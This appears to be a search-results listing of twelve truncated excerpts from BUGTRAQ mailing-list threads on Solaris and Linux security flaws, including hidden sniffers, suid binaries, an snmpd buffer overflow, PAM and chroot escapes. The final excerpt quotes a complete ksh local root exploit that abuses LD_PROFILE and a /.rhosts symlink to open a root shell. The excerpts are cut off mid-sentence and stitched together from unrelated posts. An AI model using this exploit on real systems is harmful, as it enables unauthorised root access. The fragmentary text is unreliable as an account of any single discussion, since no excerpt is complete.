>(http://www.enteract.com/~robt/Docs/Howto/Sun/sniffer-trick.txt) by Rob
>Thomas, it was brought to my attention that a sniffer can be silently
>sitting on an unplumb'ed interface on Solaris. Not only is this dangerous
This is actually very similar to how the stealth mode of the SunScreen
firewal
>> > This was on my Debian 2.2 potato system (It doesn't dump core though).
>> Just for the record:
>> on a lot of systems (including Debian), 'man' is not suid/sgid anything, and
>> this doesn't impose a security problem.
>> I don't know about Suse/Redhat/others.
>
>SuSE ships the /usr/bin/man co
>* Darren Moffat <[EMAIL PROTECTED]> [010205 19:24]:
>> Exactly what is it that man MUST do to perform the job of turning nroff
>> man pages into viewable text ?
Given the replies I got that are similar to the one below I should have
been more explicit - I knew this but wa
>The /opt/SUNWssp/snmpd command (SNMP proxy agent) is suid root
>and contains a buffer overflow, the problem occurs when it copies its own
>name (argv[0]) to an internal variable without checking out
>its length and this causes the overflow.
>
>Vulnerable Version
>
>Sun Solaris 5.8
First there is
> Ok, the example wasn't good.
> It was a long day for me, thus, please forgive me that slip-up.
>
This is certainly a much better example, but:
> For example, many httpd servers work with the same privileges,
> it means that you can read any CGI temporary file, and other
> files readable only by
>We called Sun today, and obviously they don't give a damn. They refuse to
>consider this as a bug, as long as it is possible to correct the problem via
>the rmmount.conf file (which is true).
Firstly I can only give my apologies for this, and assure everyone on
BUGTRAQ that I am looking into thi
>You can run the server as root or as some other user. In order to use PAM
>(Pluggable Authentication Module) it has to run as root.
A general comment about PAM rather than this specific problem.
It is NOT a requirement of the PAM framework that the application be running as
root. There are two cas
>corrected. The spellhist file, however, still uses the same permissions as
>Solaris 7 did. Granted this issue won't result in a root
>compromise it does allow for users to fill up the /var partition without
>having root access.
The 666 permissions are required for spell to work as designed and
> The dish of the day is the Yellow Pages/NIS (NYS?) suite
>shipped with the pristine RedHat 6.1. After a standard blank installation
>the rpc.yppasswd (when used via ypasswd by domain lusers from all over the
>place) shamelessly uses the old (deprecated?) 8-character-limited des
This is r
>Last but not least, I am very interested in Kris Kennaway's claim that "It may
>also be possible to break out of the chroot jail on some platforms." If
It is possible, especially if you have /proc mounted. It is made even
more likely if you have processes inside and outside of the chroot
envir
>on all solaris/sparc app's i have used so far, there is a reason,
>why SUN does enable stack execution by default, if i am correctly
>informed this is due to some fortran or rare/old compiler issue,
>and might break some fortran or other alien language code...
Correct, some lisp and Objective C
>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
># LD_PROFILE local root exploit for solaris
># [EMAIL PROTECTED] 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + > /.rhosts
>rsh -l root localhost csh -i
This was bug# 4150646/1
12 matches